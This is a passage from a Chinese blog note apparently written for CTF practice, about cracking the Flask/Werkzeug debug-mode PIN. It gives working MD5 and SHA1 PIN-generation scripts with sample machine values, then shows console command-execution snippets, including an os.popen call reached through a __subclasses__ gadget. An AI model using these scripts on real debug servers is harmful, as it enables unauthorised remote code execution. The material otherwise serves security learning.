class="hljs-subst">&#123;h.hexdigest()[:<span class="hljs-number">20</span>]&#125;</span>&quot;</span><br>​<br><span class="hljs-comment"># If we need to generate a pin we salt it a bit more so that we don&#x27;t</span><br><span class="hljs-comment"># end up with the same value and generate out 9 digits</span><br>num = <span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    h.update(<span class="hljs-string">b&quot;pinsalt&quot;</span>)<br>    num = <span class="hljs-string">f&quot;<span class="hljs-subst">&#123;<span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>):09d&#125;</span>&quot;</span>[:<span class="hljs-number">9</span>]<br>​<br><span class="hljs-comment"># Format the pincode in groups of digits for easier remembering if</span><br><span class="hljs-comment"># we don&#x27;t have a result yet.</span><br>rv = <span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>            rv = <span class="hljs-string">&quot;-&quot;</span>.join(<br>                num[x: x + group_size].rjust(group_size, <span class="hljs-string">&quot;0&quot;</span>)<br>                <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size)<br>            )<br>            <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">else</span>:<br>        rv = num<br>​<br><span class="hljs-built_in">print</span>(rv)<br></code></pre></td></tr></table></figure>

<h4 id="python不同版本的算法也不同"><a href="#python不同版本的算法也不同" class="headerlink" title="python不同版本的算法也不同"></a>python不同版本的算法也不同</h4><h4 id="3-6-md5"><a href="#3-6-md5" class="headerlink" title="3.6 md5"></a>3.6 md5</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#MD5</span><br><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> chain<br>probably_public_bits = [<br>     <span class="hljs-string">&#x27;flaskweb&#x27;</span><br>     <span class="hljs-string">&#x27;flask.app&#x27;</span>,<br>     <span class="hljs-string">&#x27;Flask&#x27;</span>,<br>     <span class="hljs-string">&#x27;/usr/local/lib/python3.7/site-packages/flask/app.py&#x27;</span><br>]<br>​<br>private_bits = [<br>     <span class="hljs-string">&#x27;25214234362297&#x27;</span>,<br>     <span class="hljs-string">&#x27;0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa&#x27;</span><br>]<br>​<br>h = hashlib.md5()<br><span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>        <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, <span class="hljs-built_in">str</span>):<br>        bit = bit.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    h.update(bit)<br>h.update(<span class="hljs-string">b&#x27;cookiesalt&#x27;</span>)<br>​<br>cookie_name = <span class="hljs-string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="hljs-number">20</span>]<br>​<br>num = <span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>   h.update(<span class="hljs-string">b&#x27;pinsalt&#x27;</span>)<br>   num = (<span class="hljs-string">&#x27;%09d&#x27;</span> % <span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>))[:<span class="hljs-number">9</span>]<br>​<br>rv =<span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>   <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>       <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>          rv = <span class="hljs-string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="hljs-string">&#x27;0&#x27;</span>)<br>                      <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size))<br>          <span class="hljs-keyword">break</span><br>       <span class="hljs-keyword">else</span>:<br>          rv = num<br>​<br><span class="hljs-built_in">print</span>(rv)<br></code></pre></td></tr></table></figure>

<h4 id="3-8-sha1"><a href="#3-8-sha1" class="headerlink" title="3.8 sha1"></a>3.8 sha1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#sha1</span><br><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> chain<br>probably_public_bits = [<br>    <span class="hljs-string">&#x27;root&#x27;</span><br>    <span class="hljs-string">&#x27;flask.app&#x27;</span>,<br>    <span class="hljs-string">&#x27;Flask&#x27;</span>,<br>    <span class="hljs-string">&#x27;/usr/local/lib/python3.8/site-packages/flask/app.py&#x27;</span><br>]<br>​<br>private_bits = [<br>    <span class="hljs-string">&#x27;2485377581187&#x27;</span>,<br>    <span class="hljs-string">&#x27;653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd&#x27;</span><br>]<br>​<br>h = hashlib.sha1()<br><span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>        <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, <span class="hljs-built_in">str</span>):<br>        bit = bit.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    h.update(bit)<br>h.update(<span class="hljs-string">b&#x27;cookiesalt&#x27;</span>)<br>​<br>cookie_name = <span class="hljs-string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="hljs-number">20</span>]<br>​<br>num = <span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    h.update(<span class="hljs-string">b&#x27;pinsalt&#x27;</span>)<br>    num = (<span class="hljs-string">&#x27;%09d&#x27;</span> % <span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>))[:<span class="hljs-number">9</span>]<br>​<br>rv =<span class="hljs-literal">None</span><br><span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>    <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>            rv = <span class="hljs-string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="hljs-string">&#x27;0&#x27;</span>)<br>                          <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size))<br>            <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">else</span>:<br>        rv = num<br>​<br><span class="hljs-built_in">print</span>(rv)<br></code></pre></td></tr></table></figure>

<h3 id="Console控制台执行指令"><a href="#Console控制台执行指令" class="headerlink" title="Console控制台执行指令"></a>Console控制台执行指令</h3><h4 id="这里做题就是进入控制台，然后执行命令"><a href="#这里做题就是进入控制台，然后执行命令" class="headerlink" title="这里做题就是进入控制台，然后执行命令"></a>这里做题就是进入控制台，然后执行命令</h4><figure class="highlight python-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python-repl"><br>1. os<br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python"><span class="hljs-keyword">import</span> os</span><br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python">os.popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read()</span><br><br>2. subprocess.check_output<br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python"><span class="hljs-keyword">import</span> subprocess</span><br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python">subprocess.check_output([<span class="hljs-string">&#x27;whoami&#x27;</span>])</span><br><br>3. subprocess.run<br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python"><span class="hljs-keyword">import</span> subprocess</span><br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python">subprocess.run([<span class="hljs-string">&#x27;whoami&#x27;</span>], capture_output=<span class="hljs-literal">True</span>, text=<span class="hljs-literal">True</span>)</span><br><br>4. subprocess.Popen<br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python"><span class="hljs-keyword">import</span> subprocess</span><br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python">subprocess.Popen([<span class="hljs-string">&#x27;whoami&#x27;</span>], stdout=subprocess.PIPE).stdout.read()</span><br><br>5. find classes<br><span class="hljs-meta prompt_">&gt;&gt;&gt;</span> <span class="language-python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">137</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;whoami&#x27;</span>).read()</span><br><br></code></pre></td></tr></table></figure>

<p>参考文章：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/340739.html">深入浅出Flask PIN - FreeBuf网络安全行业门户</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/python/" class="category-chain-item">python</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/note/" class="print-no-link">#note</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>flask debug 模式下的pin码</div>
      <div>http://example.com/2024/09/20/flask-debug-模式下的pin码/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>鱿鱼</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/10/31/Shiro-Remember-Me-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" title="Shiro Remember Me 反序列化漏洞（CVE-2016-4437 Shiro-550）">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Shiro Remember Me 反序列化漏洞（CVE-2016-4437 Shiro-550）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/09/17/%E7%8E%84%E6%9C%BA%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" title="玄机WP">
                        <span class="hidden-mobile">玄机WP</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"NspbmfZxbZKiA8WtZztA4utZ-gzGzoHsz","appKey":"Bley809j6xSm4e5hV132okkC","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量
        <span id="leancloud-site-pv"></span>
        次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数
        <span id="leancloud-site-uv"></span>
        人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
